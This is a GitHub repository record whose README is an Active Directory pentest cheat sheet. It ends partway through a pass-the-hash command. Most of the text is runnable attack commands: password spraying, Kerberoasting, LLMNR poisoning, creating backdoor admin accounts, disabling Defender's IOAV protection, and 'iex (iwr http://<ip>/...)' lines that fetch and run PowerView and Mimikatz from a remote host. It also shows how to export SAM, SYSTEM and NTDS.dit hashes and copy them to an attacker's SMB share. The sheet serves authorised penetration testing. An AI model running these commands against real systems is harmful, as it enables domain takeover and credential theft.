{"id":22927850,"url":"https://github.com/rodolfomarianocy/tricks-pentest-active-directory","last_synced_at":"2026-01-08T08:41:22.615Z","repository":{"id":64579068,"uuid":"528064572","full_name":"rodolfomarianocy/Tricks-Pentest-Active-Directory","owner":"rodolfomarianocy","description":"Repository with quick triggers to help during Pentest in an Active Directory environment.","archived":false,"fork":false,"pushed_at":"2024-10-27T22:16:36.000Z","size":762,"stargazers_count":43,"open_issues_count":0,"forks_count":14,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-02-07T10:16:09.038Z","etag":null,"topics":["active-directory","attack","exploitation","hacking","pentest","pentest-active-directory","pentesting","tips","tricks","vulnerability"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rodolfomarianocy.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-08-23T16:00:22.000Z","updated_at":"2025-01-28T12:01:26.000Z","dependencies_parsed_at":"2024-02-01T03:45:51.608Z","dependency_job_id":"c8994994-d3be-4fb8-850e-4326f094d2f5","html_url":"https://github.com/rodolfomarianocy/Tricks-Pentest-Active-Directory","commit_stats":null,"previous_names":["rodolfomarianocy/tricks-pentest-active-directory"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rodolfomarianocy%2FTricks-Pentest-Active-Directory","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rodolfomarianocy%2FTricks-Pentest-Active-Directory/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rodolfomarianocy%2FTricks-Pentest-Active-Directory/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rodolfomarianocy%2FTricks-Pentest-Active-Directory/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rodolfomarianocy","download_url":"https://codeload.github.com/rodolfomarianocy/Tricks-Pentest-Active-Directory/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246667316,"owners_count":20814712,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["active-directory","attack","exploitation","hacking","pentest","pentest-active-directory","pentesting","tips","tricks","vulnerability"],"created_at":"2024-12-14T09:16:33.937Z","updated_at":"2026-01-08T08:41:22.608Z","avatar_url":"https://github.com/rodolfomarianocy.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003ch1 align=\"center\"\u003eTricks - Active Directory Penetration Tester\u003c/h1\u003e  \n\n\u003cp align=\"center\"\u003e\n  \u003cimg height=500 src=\"https://github.com/rodolfomarianocy/AD-Exploitation-Basics/assets/54555784/91c3d1af-47b9-40d8-8bf6-4fa435fb06c1\"/\u003e\n\u003c/p\u003e\n\u003ch2 align=\"center\"\u003e [x] In construction...\u003c/h2\u003e\n\n## Topics\n- [Windows Server AD e Azure AD](#windows-server-ad-e-azure-ad)\n- [Domain Authentication](#domain-authentication)\n- [Domain Services](#domain-services)\n- [Recon Passive](#recon-passive)\n- [Recon Active](#recon-active)\n- [Capturing Information](#capturing-information)\n- [AD Enumeration](#ad-enumeration)\n- [Basic Active Directory Attacks](#basic-active-directory-attacks)\n- [Port Forwarding and Proxying](#port-forwarding-and-proxying)\n- [Bypass and Disable](#bypass-and-disable)\n- [Local Privilege Escalation](#local-privilege-escalation)\n- [Escalating privileges across domains](#escalating-privileges-across-domains)\n- [Across Forest using Trust Tickers](#across-forest-using-trust-tickets)\n- [Persistence](#persistence)\n- [Attacks Detection via Events](#attacks-detection-via-events)\n- [Mitigation and Defense Mechanisms](#mitigation-and-defense-mechanisms)\n- [Pentest Azure AD](#pentest-azure-ad)\n\n---\n\n## Windows Server AD e Azure AD\n### Windows Server AD  \n  \n-\u003e LDAP  \n-\u003e NTLM  \n-\u003e Kerberos  \n-\u003e OU Tree  \n-\u003e Domains and Forests  \n-\u003e Trusts  \n\n### Azure AD  \n-\u003e Rest API's  \n-\u003e OAuth/SAML  \n-\u003e OpenID  \n-\u003e Flat Structure  \n-\u003e Tenant  \n-\u003e Guests  \n  \n---\n## Domain Authentication\n### Kerberos - Ticket Based  \n\u003ca href=\"https://www.manageengine.com/products/active-directory-audit/kb/images/event-4771-kerberos-authentication-illustration.jpg\" \u003e\n  \u003cimg height=\"310em\" src=\"https://www.manageengine.com/products/active-directory-audit/kb/images/event-4771-kerberos-authentication-illustration.jpg\" /\u003e\n\u003c/a\u003e\n\nReference:\n- https://www.manageengine.com/products/active-directory-audit/kb/windows-security-log-event-id-4769.html\n\n### NTLM (NT LAN Manager) - Challenge/Response Based \n\n\u003ca href=\"https://filestore.community.support.microsoft.com/api/images/45bc59ef-a2e7-4a75-a129-8be12a01dd16?upload=true\"\u003e\n  \u003cimg src=\"https://filestore.community.support.microsoft.com/api/images/45bc59ef-a2e7-4a75-a129-8be12a01dd16?upload=true\" /\u003e\n\u003c/a\u003e\n\nReference:\n- https://www.action1.com/zerologon-windows-vulnerability-what-is-it-and-how-to-tackle-it/\n\n## Domain Services\nLDAP - Lightweight Directory Access Protocol  \nCertificate Services  \nDomain Name Services(DNS, LLMNR, NBT-NS)  \n\n## Recon Passive\n[X] In Construction  \nSearch for information such as: user ID's, enrollment, logins, emails, credentials in:  \n-\u003e Social Media (Linkedin, Instagram, Twitter, etc...);  \n-\u003e Look for leaks in search engines with shodan and services with pastebin;  \n-\u003e Code Repositories (github, gitlab, bitbucket, etc...) Using google dorking or web services like grep.app:  \nhttps://grep.app/  \n-\u003e Discovery emails how Hunter.io, snov.io, mindlead.io and emailfinder for example:  \nhttps://hunter.io/  \nhttps://snov.io/email-finder\nhttps://minelead.io/search/\nhttps://github.com/Josue87/EmailFinder  \n\n## Recon Active\n### Host Discovery\n-\u003e nmap static binary  \n```\nnmap -sn 10.10.0.0/16\n```\nhttps://github.com/andrew-d/static-binaries/tree/master/binaries  \n-\u003e crackmapexec  \n```\ncrackmapexec smb 192.168.0.20/24\n```\n\n-\u003e Ping Sweep - PowerShell\n```\nfor ($i=1;$i -lt 255;$i++) { ping -n 1 192.168.0.$i| findstr \"TTL\"}\n```\n\n-\u003e Ping Sweep - Bash\n```\nfor i in {1..255};do (ping -c 1 192.168.0.$i | grep \"bytes from\" \u0026); done\n```\n\n-\u003e Port Scanning - Bash\n```\nfor i in {1..65535}; do (echo \u003e /dev/tcp/192.168.1.1/$i) \u003e/dev/null 2\u003e\u00261 \u0026\u0026 echo $i is open; done\n```\n-\u003e Port Scanning - NetCat\n```\nnc -zvn \u003cip\u003e 1-1000\n```\nhttps://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat\n\n### Capturing Information\n-\u003e nmap  \n```\nnmap -sC -sV -A -Pn -T5 -p- \u003cip\u003e\n```\n\n-\u003e rustscan\n```\nrustscan -a \u003cip\u003e -- -A -Pn\n```\n\n-\u003e enum4linux  \n```\nenum4linux \u003cip\u003e\n```\n```\nenum4linux -a -u \"\" -p \"\" \u003cip\u003e \u0026\u0026 enum4linux -a -u \"guest\" -p \"\" \u003cip\u003e\n```\n\n### Enumerating Users via Kerberos\n-\u003e kerbrute  \n```\nkerbrute userenum -d \u003cdomain\u003e --dc \u003cip\u003e userlist.txt\n```\n-\u003e nmap  \n```\nsudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=test.local,userlist.txt \u003cip\u003e\n```\n-\u003e Wordlists  \nhttps://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt  \nhttps://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt  \n\n-\u003e lookupsid.py via RPC  \n```\nimpacket-lookupsid anonymous@\u003cip\u003e\n```  \nhttps://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/lookupsid.py  \n\n### Changing expired password via smbpasswd\n-\u003e Identify  \n```\ncrackmapexec smb $IP -u users.txt -p pass.txt  \n\\\\ STATUS_PASSWORD_MUST_CHANGE\n```\n-\u003e Changing expired password\n```\nsmbpasswd -r \u003cip\u003e -U \u003cuser\u003e\n```\n\n### Validate Credentials/Permissions\n-\u003e Validation of network user credentials via smb using crackmmapexec  \n```\ncrackmapexec smb 192.168.0.10-20 -u administrator -H \u003chash\u003e -d \u003cdomain\u003e --continue-on-success\ncrackmapexec smb 192.168.0.10-20 -u administrator -H \u003chash\u003e -d \u003cdomain\u003e \ncrackmapexec smb 192.168.0.10-20 -u administrator -H \u003chash\u003e --local-auth --lsa  \ncrackmapexec smb 192.168.0.10-20 -u administrator -p \u003cpassword\u003e\n```\n\n-\u003e List SMB shared folders authentically\n```\nsmbclient -L //\u003cdomain\u003e -I \u003cIP\u003e -U \u003cuser\u003e\n```\n\n-\u003e Access a shared folder via SMB\n```\nsmbclient //\u003cdomain\u003e/folder -I \u003cIP\u003e -U \u003cuser\u003e\n```\n\n-\u003e smbmap\n```\nsmbmap -H \u003cip\u003e -u \u003cuser\u003e \n```\n\n-\u003e See read permission of given user on smb shares\n```\ncrackmapexec smb \u003cip\u003e --shares -u \u003cuser\u003e -p '\u003cpass\u003e'\n```\n\n### Remote Access\n#### Remote Desktop Protocol - RDP\n\n-\u003e Create a user  \n```\nnet user \u003cuser\u003e \u003cpassword\u003e /add\n```\n\n-\u003e Add to local administrators group  \n```\nnet localgroup Administrators \u003cuser\u003e /add\n```\n\n-\u003e Add to group of users who can access via RDP\n```\nnet localgroup \"Remote Management Users\" \u003cuser\u003e /add\nnet localgroup \"Remote Desktop Users\" \u003cuser\u003e /add\n```\n\n-\u003e Enable RDP\n```\nSet-ItemProperty -Path 'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server' -name \"fDenyTSConnections\" -value 0\nEnable-NetFirewallRule -DisplayGroup \"Remote Desktop\"\n```\n\n-\u003e move to another user  \n```\nrunas /user:\u003chostname\u003e\\\u003cuser\u003e cmd\n```\n\n-\u003e xfreerdp via RDP with sharing in \\\\\\tsclient\\share\\\n```\nxfreerdp /u:user /p:pass /v:ip +clipboard /dynamic-resolution /cert:ignore /drive:/usr/share/windows-resources,share\n```\n-\u003e rdesktop via RDP  \n```\nrdesktop -u \u003cuser\u003e -p \u003cpassword\u003e -d \u003cdomain\u003e -f \u003cip\u003e\n```\n-\u003e evil-winrm\n```\nevil-winrm -i \u003cip\u003e -u \u003cuser\u003e -p \u003cpassword\u003e\n```\n\n## AD Enumeration\n#### net commands of Command Prompt  \n-\u003e List domain users  \n```\nnet user /domain\n```\n\n-\u003e List domain groups  \n```\nnet group /domain\n```\n\n-\u003e View memberships for a particular group  \n```\nnet localgroup \u003cgroup\u003e\n```\n\n-\u003e Enumerate domain password policy  \n```\nnet accounts /domain\n```\n\n-\u003e View interfaces and network information\n```\nipconfig /all\n```\n\n-\u003e View all active TCP connections and the TCP and UDP ports the host is listening on\n```\nnetstat -ant\n```\n\n-\u003e List running processes\n```\ntasklist\n```\n\n-\u003e View system tasks\n```\nschtasks\n```\n\n#### cmdlets of Powershell \n-\u003e Configure ActiveDirectory Module - RSAT\n```\ncurl https://raw.githubusercontent.com/samratashok/ADModule/master/ActiveDirectory/ActiveDirectory.psd1 -o ActiveDirectory.psd1  \ncurl https://github.com/samratashok/ADModule/blob/master/Microsoft.ActiveDirectory.Management.dll?raw=true -o Microsoft.ActiveDirectory.Management.dll  \nImport-Module .\\Microsoft.ActiveDirectory.Management.dll  \nImport-Module .\\ActiveDirectory.psd1  \n```\n\n-\u003e Configure PowerView Module\n```\ncurl https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 -o PowerView.ps1\n. .\\PowerView.ps1\n```\n\n-\u003e List all AD users - properties/description\n```\nGet-ADUser -Filter * (AD Module)\nGet-NetUser (PowerView)\nGet-NetUser -Username user (PowerView)\nGet-UserProperty (PowerView)\nGet-UserProperty -Filter pwdlastset (PowerView)\nGet-ADUser -Filter 'Description -like \"*built*\"' -Properties Description | select name,Description\nFind-UserField -SearchField Description -SearchTerm \"built\"\n```\n\n-\u003e Get all information from a specific user, format it in a table and seeing only the Name attribute\n```\nGet-ADUser -Identity \u003cuser\u003e -Server \u003cserver\u003e -Properties * | Format-Table Name,SamAccountName -A\n```\n\n-\u003e Logged On Users\n```\nGet-NetLoggedon -ComputerName \u003cdomain\u003e\n```\n\n-\u003e Get locally logged users\n```\nGet-LoggedonLocal -ComputerName \u003cdomain\u003e\n```\n\n-\u003e Last logon\n```\nGet-LastLoggedOn -ComputerName \u003cdomain\u003e\n```\n\n-\u003e List Computers\n```\nGet-NetComputer (PowerView)\nGet-NetComputer -OperatingSystem \"*\u003cversion\u003e*\" (PowerView)\nGet-NetComputer -Ping (PowerView)\nGet-NetComputer -FullData (PowerView)\nGet-ADComputer -Filter * -Properties * (AD Module)\nGet-ADComputer -Filter * | select Name (AD Module)\nGet-ADComputer -Filter * |  findstr \u003corganizationalunit\u003e (AD Module)\nGet-ADComputer -Filter 'OperatingSystem -like \"*Server 2016*\"' -Properties OperatingSystem | select Name,OperatingSystem (AD Module)\nGet-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName} (AD Module)\n```\n\n-\u003e Add domain user to a domain group\n```\nAdd-DomainGroupMember -Identity 'SQLManagers' -Members 'examed'\nGet-NetGroupMember -GroupName 'SQLManagers'\n```\n\n-\u003e Get machines from user from spefific group\n```\nFind-GPOLocation -UserName \u003cuser\u003e -Verbose (PowerView)\n```\n-\u003e Find Shares,file servers and sensitive files\n```\nGet-SmbShare (AD Module)\nInvoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC –Verbose (PowerView)\nInvoke-FileFinder -Verbose (PowerView)\nGet-NetFileServer (PowerView)\n```\n-\u003e List GPO\n```\nGet-NetGPO (PowerView)\nGet-NetGPO -ComputerName \u003chostname\u003e.domain\u003e (PowerView)\nGet-GPO -All (PowerView)\n```\n\n-\u003e Get OUs and GPO aplliend on an OU\n```\nGet-ADOrganizationalUnit -Filter * (AD Module)\nGet-NetOU -FullData (PowerView)\nGet-NetOU \u003cou\u003e| %{Get-NetComputer -ADSPath $_} (PowerView)\nGet-NetGPO -GPOname \u003cguid\u003e (PowerView)\n```\n\n-\u003e Get ACLs from user\n```\nGet-ObjectAcl -SamAccountName \u003cuser\u003e -ResolveGUIDs (PowerView)\n```\n\n-\u003e Get ACL associated with prefix,path and LDAP\n```\nGet-ObjectAcl -ADSprefix '\u003cprefix\u003e' -Verbose (PowerView)\nGet-ObjectAcl -ADSpath \"\u003cLDAP\u003e\" -ResolveGUIDs -Verbose (PowerView)\n(Get-ACL 'AD:\\CN=Administrator, CN=Users, DC=example, DC=okay, DC=local').Access\nGet-PathAcl -Path \"\u003cpath\u003e\" (PowerView)\n```\n\n-\u003e Search ACEs\n```\nInvoke-ACLScanner -ResolveGUIDs (PowerView)\n```\n\n-\u003e Get groups current domain\n```\nGet-NetGroup (PowerView)\nGet-NetGroup -Domain \u003cdomain\u003e (PowerView)\nGet-NetGroup -FullData (PowerView)\nGet-ADGroup -Filter * | select Name (AD Module)\nGet-ADGroup -Filter * -Properties * (AD Module)\n```\n\n-\u003e List local gorups on machine\n```\nGet-NetLocalGroup -ComputerName \u003cdomain\u003e -ListGroups (PowerView)\n```\n\n-\u003e Get members of local group\n```\nGet-NetLocalGroup -ComputerName \u003cdomain\u003e -Recurse (PowerView)\n```\n\n-\u003e Get member from group\n```\nGet-NetGroupMember -GroupName '\u003cgroup_name\u003e' (PowerView)\nGet-NetGroupMember -GroupName '\u003cgroup_name\u003e' -Domain \u003cdomain\u003e (PowerView)\nGet-NetGroupMember -GroupName \"Domain Admins\" -Recurse (PowerView)\nGet-NetGroup -UserName \u003cuser\u003e (PowerView)\nGet-ADGroupMember -Identity \"Domain Admins\" -Recursive (AD Module)\nGet-ADGroupMember -Identity \"Enterprise Administrators\" -Recursive (AD Module)\nGet-ADPrincipalGroupMembership -Identity \u003cuser\u003e (AD Module)\n```\n\n-\u003e Enumerate AD Admins Group Membership\n```\nGet-ADGroup -Identity Administrators -Server \u003cserver\u003e -Properties * (AD Module)\nGet-ADGroup -Filter 'Name -like \"*admin*\"' | select Name (AD Module)\n```\n\n-\u003e Provides domain-specific information\n```\nGet-ADDomain -Server \u003cserver\u003e (AD Module)\nGet-NetDomain -Domain domain.local (PowerView)\n```\n\n-\u003e Get objects in Domain\n```\nGet-ADDomain -Identity domain.local (AD Module)\n```\n\n-\u003e Get GRP from Restricted Groups or groups.xml\n```\nGet-NetGPOGroup (PowerView)\n```\n\n-\u003e Domain Trust\n```\nGet-NetForestDomain (PowerView)\nGet-ADForest (AD Module)\n(Get-ADForest).Domains (AD Module)\nGet-NetDomainTrust -Domain \u003cdomain\u003e (PowerView)\nGet-ADForest | %{Get-ADTrust -Filter *}\nGet-NetForestDomain -Verbose | Get-NetDomainTrust (PowerView)\nGet-NetForestDomain -Verbose | Get-NetDomainTrust | ?{$_.TrustType -eq 'External'} (PowerView)\n(Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_} (AD Module)\nGet-NetDomainTrust | ?{$_.TrustType -eq 'External'} (PowerView)\nGet-ADTrust -Filter * -Server \u003cdomain_external\u003e\n```\n\n-\u003e Get SID for current domain\n```\nGet-DomainSID (PowerView)\n(Get-ADDomain).DomainSID (ADModule)\n```\n\n-\u003e To perform an assertive password spraying attack, you can enumerate accounts that have badPwdCount greater than 0 and avoid them during the attack.\n```\nGet-ADObject -Filter 'badPwdCount -gt 0' -Server za.tryhackme.com (ADModule)\n```\n\n-\u003e Search for AD object that was changed on a specific date\n```\n$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)\nGet-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server za.tryhackme.com\n```\n\n-\u003e Get info from Domain Policies\n```\nGet-DomainPolicy (PowerView)\n```\n\n-\u003e Get domain controllers from current domain  \n```\nGet-NetDomainController (PowerView)\nGet-ADDomainController (AD Module)\n```\n\n-\u003e User Hunting - finds machines on the domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines\n```\niex (iwr http://\u003cip\u003e/PowerView.ps1 -UseBasicParsing)\nInvoke-UserHunter\nInvoke-UserHunter -Stealth\nInvoke-UserHunter -CheckAccess\nInvoke-UserHunter -GroupName \"\u003cgroup\u003e\" (PowerView)\nGet-NetSession -ComputerName \u003cdomain\u003e (validate access) (PowerView)\n```\n\n-\u003e Local Admin Access from all machines and PSSession stateless and stateful\n```\niex (iwr http://\u003cfile_server_IP\u003e/PowerView.ps1 -UseBasicParsing)\niex (iwr http://\u003cfile_server_IP\u003e/Find-PSRemotingLocalAdminAccess.ps1 -UseBasicParsing)\niex (iwr http://\u003cfile_server_IP\u003e/Find-WMILocalAdminAccess.ps1 -UseBasicParsing)\nInvoke-CheckLocalAdminAccess  \nFind-LocalAdminAccess  \n. .\\Find-PSRemotingLocalAdminAccess.ps1\nFind-PSRemotingLocalAdminAccess\n. .\\Find-WMILocalAdminAccess.ps1\nFind-WMILocalAdminAccess\n```\n```\nInvoke-Command -ScriptBlock {whoami} -ComputerName \u003chostname\u003e \nEnter-PSSession -ComputerName \u003chostname\u003e\n```\nor  \n```\n$sess = New-PSSession -ComputerName \u003chostname\u003e\nEnter-PSSession $sess\n```\nor  \n-\u003e PsExec64.exe  \n```\nPsExec64.exe \\\\\u003chostname\u003e.\u003cdomain\u003e -u \u003cdomain\u003e\\user -p \u003cpassword\u003e cmd\n```\n\n### Capturing configuration file credentials\n-\u003e Powershell History  \n```\ntype %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt\n```\n\n-\u003e EXploiting Saved Windows Credentials\n```\ncmdkey /list  \nrunas /savecred /user:admin cmd.exe\n```\n\n-\u003e IIS Configuration  \n```\ntype C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config | findstr connectionString  \ntype C:\\inetpub\\wwwroot\\web.config | findstr connectionString\n```\n  \n-\u003e Retrieve Credentials from Software: PuTTY  \n```\nreg query HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\Sessions\\ /f \"Proxy\" /s\n```\n\n-\u003e Unattended Windows Installations\n```\nC:\\Unattend.xml\nC:\\Windows\\Panther\\Unattend.xml\nC:\\Windows\\Panther\\Unattend\\Unattend.xml\nC:\\Windows\\system32\\sysprep.inf\nC:\\Windows\\system32\\sysprep\\sysprep.xml\n```\n  \n-\u003e Identify  \n```\ndir /s *.db\n```\n\n-\u003e McAfee Enterprise Endpoint Security - Credentials used during installation  \n```\nC:\\ProgramData\\McAfee\\Agent\\DB\\ma.db\nsqlitebrowser ma.db\npython2 mcafee_sitelist_pwd_decrypt.py \u003cAUTH PASSWD VALUE\u003e\n```\nhttps://raw.githubusercontent.com/funoverip/mcafee-sitelist-pwd-decryption/master/mcafee_sitelist_pwd_decrypt.py\n\n### Automated AD Enumeration and Dumping\n#### BoodHound\npassword default = neo4j:neo4j\n-\u003e Install and start neo4j - http://localhost:7474/\n```\nneo4j.bat windows-service install\nneo4j.bat start\n```\nhttps://neo4j.com/download-center/\n\n-\u003e BloodHound.exe  \nhttps://github.com/BloodHoundAD/BloodHound/\n\nor  \n\n-\u003e Install linux\n```\nsudo apt install bloodhound\n```\n-\u003e neo4j start - http://localhost:7474/\n```\nsudo neo4j start\n```\n\n-\u003e Enumeration - Windows\n```\niwr -uri \u003cip\u003e/SharpHound.ps1 -Outfile SharpHound.ps1\n. .\\SharpHound.ps1\nInvoke-Bloodhound -CollectionMethod All,loggedon\nInvoke-BloodHound -CollectionMethod All -Verbose\nInvoke-BloodHound -CollectionMethod LoggedOn -Verbose\n```\n\n-\u003e bloodhound-python - Dumping and viewing AD tree\n\n```\nsudo bloodhound-python -u \u003cuser\u003e -p \u003cpassword\u003e -ns \u003cip_dc\u003e -d test.local -c all\n```\nhttps://github.com/fox-it/BloodHound.py\n\n-\u003e enum4linux - enumeration\n```\nenum4linux -v -u \u003cuser\u003e -p \u003cpass\u003e -a \u003cip\u003e\n```\n-\u003e ldapdomaindump - Dump AD  \nhttps://github.com/dirkjanm/ldapdomaindump\n\n## Basic Active Directory Attacks\n### Password Spraying\n-\u003e kerbrute  \n```\nkerbrute passwordspray -d test.local --dc \u003cip\u003e users.txt pass@2022\n```\n-\u003e crackmapexec  \n```\ncrackmapexec smb \u003cip\u003e -u users.txt -p pass@2022 --no-bruteforce\n```\n\n### AS-REP Roasting Attack - not require Pre-Authentication  \n-\u003e kerbrute - Enumeration Users\n```\nkerbrute userenum -d test.local --dc \u003cdc_ip\u003e userlist.txt\n```\nhttps://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt\n\n-\u003e GetNPUsers.py - Query ASReproastable accounts from the KDC  \n```\npython GetNPUsers.py domain.local/ -dc-ip \u003cip\u003e -usersfile userlist.txt\n```\nhttps://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetNPUsers.py\n\n### Kerberoasting \n-\u003e GetUserSPNs \n```\nimpacket-GetUserSPNs '\u003cdomain\u003e/\u003cuser\u003e:\u003cpassword\u003e' -dc-ip \u003cip\u003e -request\n```\nhttps://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetUserSPNs.py\n\n### LDAP Pass-back \n-\u003e Creating a rogue LDAP server  \n```\nsudo apt-get update \u0026\u0026 sudo apt-get -y install slapd ldap-utils \u0026\u0026 sudo systemctl enable slapd\n```\n```\nsudo dpkg-reconfigure -p low slapd\n```\n\n-\u003e Creating file for ensuring that the LDAP server only supports PLAIN and LOGIN authentication methods  \n```\ndn: cn=config\nreplace: olcSaslSecProps\nolcSaslSecProps: noanonymous,minssf=0,passcred\n```\n```\nsudo tcpdump -SX -i breachad tcp port 389\n```\n\n### NetNTLM Authentication Exploits with SMB\nResponder allows you to perform Man-in-the-Middle attacks by poisoning responses during NetNTLM authentication, making the client talk to you instead of the real server it wants to connect to.\n\n#### LLMNR Poisoning - Capturing hash in responder\nOn a real lan network, the responder will attempt to poison all Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Server (NBT-NS), and Web Proxy Auto-Dscovery (WPAD) requests detected. NBT-NS is the precursor protocol to LLMNR.  \n\n```\nresponder -I eth0 -v\n```\n\n---\n\n### Exploring Microsoft Deployment Toolkit - MDT\n-\u003e Identify MDT  \n-\u003e Extract  PXE Boot Image  \n```\ntftp -i \u003cIP\u003e GET \"\\Tmp\\x86x64{...}.bcd\" conf.bcd\n```\n\n-\u003e Retrieve the locations of PXE boot images from BCD file\n```\npowershell -executionpolicy bypass\nImport-Module .\\PowerPXE.ps1\n$BCDFile = \"conf.bcd\"\nGet-WimFile -bcdFile $BCDFile\ntftp -i \u003cIP\u003e GET \"\u003cPXE Boot Image Location\u003e\" pxeboot.wim\n```\n\n-\u003e Retrieve credentials from a PXE Boot Image  \n```\nGet-FindCredentials -WimFile pxeboot.wim\n```\nhttps://github.com/wavestone-cdt/powerpxe  \n\n### Extracting hashes\n#### Intro\n-\u003e SAM - Security Account Manager (Store as user accounts)  %SystemRoot%/system32/config/sam  \n-\u003e NTDS.DIT (Windows Server / Active Directory - Store AD data including user accounts) %SystemRoot%/ntds/ntds.dit  \n-\u003e SYSTEM (System file to decrypt SAM/NTDS.DIT)  %SystemRoot%/system32/config/system  \n-\u003e Backup - Sistemas antigos como XP/2003: C:\\Windows\\repair\\sam and C:\\Windows\\repair\\system\n\n#### Get sam and system by registry (From old versions to recent versions)\n```\nreg save hklm\\sam sam\nreg save hklm\\system system\n```\n\n-\u003e transfer sam and syste via sharing files via SMB\n-\u003e Configuring smb server 1    \n```\nimpacket-smbserver share . -smb2support -user user -password teste321\n```\n-\u003e Configuring smb server 2  \n```\nnet use \\\\\u003csmbserver\u003e\\share /USER:user teste321\ncopy C:\\Users\\Backup\\sam.hive \\\\\u003csmbserver\u003e\\share\\\ncopy C:\\Users\\Backup\\system.hive \\\\\u003csmbserver\u003e\\share\\\n```\nhttps://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/smbserver.py\n\n-\u003e View smb enumeration  \n\n```\nnet view \\\\dc /all\nnet use * \\\\dc\\c$\nnet use\n```\n\n-\u003e use impacket-secretsdump  \n```\nimpacket-secretsdump -sam sam -system system LOCAL\n```\n\n#### Get ntds.dit and system by registry - Active Directory\n\n-\u003e vssadmin - Volume shadow copy (Windows Server \\ recent versions)\n```\nvssadmin create shadow /for=c:\n```\n\n-\u003e copy ntds.dit and system\n```\ncopy \u003cShadow_Copy_Name\u003e\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit.save\ncopy \u003cShadow_Copy_Name\u003e\\Windows\\System32\\config\\SYSTEM C:\\Windows\\Temp\\system.save\n```\n\n-\u003e delete volume shadow copy\n```\nvssadmin delete shadows /shadow=\u003cShadow_Copy_Id\u003e\n```\n\n-\u003e use impacket-secretsdump  \n```\nimpacket-secretsdump -ntds ntds.dit.save -system system.save LOCAL\n```\n\n#### Others\n-\u003e meterpreter  \n```\nhashdump\n```\n\n-\u003e samdump2 (Win 2k/NT/XP/Vista SAM)   \n```\nsamdump2 system sam\n```\n\n#### Extracting Hashes in Domain and Pivoting  \n-\u003e Dump the credentials of all connected users, including cached hashes\n```\nmimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\"\n```\n-\u003e mimikatz + ScriptBlock\n```\n$sess = New-PSSession -ComputerName \u003chostname\u003e\n```\n```\nInvoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess\niex (iwr http://\u003cip\u003e/Invoke-Mimikatz.ps1 -UseBasicParsing)\nInvoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess\n```\nor  \n```\nInvoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess\nInvoke-Command -FilePath .\\Invoke-Mimikatz.ps1 -Session $sess\nEnter-PSSession $sess\nInvoke-Mimikatz\n```\n\n#### Extracting Hashes in cache\n-\u003e fgdump  \n```\nfgdump.exe\n```\n/usr/share/windows-binaries/fgdump/fgdump.exe\n\n-\u003e meterpreter  \n```\nload kiwi\ncreds_msv\n```\n\n-\u003e wce-universal (Clear Text password)   \n```\nwce-universal.exe -w\n```\n/usr/share/windows-resources/wce/wce-universal.exe \n\n-\u003e mimikatz\n```\n.\\mimikatz.exe\nsekurlsa::wdigest -a full  \nsekurlsa::logonpasswords\n```\n\n-\u003e mimikatz - meterpreter  \n```\nload mimikatz  \nwdigest\n```\n\n#### Extracting Hashes (Remote)\n```\nimpacket-secretsdump user:password@IP\n```\n\n### Pass-The-Hash and Over-Pass-The-Hash\n-\u003e mimikatz (perform the pass the hash technique for the machine account to elevate access to domain admin)\n```\niex (iwr http://\u003cfile_server_IP\u003e/Invoke-Mimikatz.ps1 -UseBasicParsing)\nInvoke-Mimikatz -Command '\"sekurlsa::pth /user:\u003cuser\u003e /domain:\u003cdomain\u003e /ntlm:\u003chash\u003e 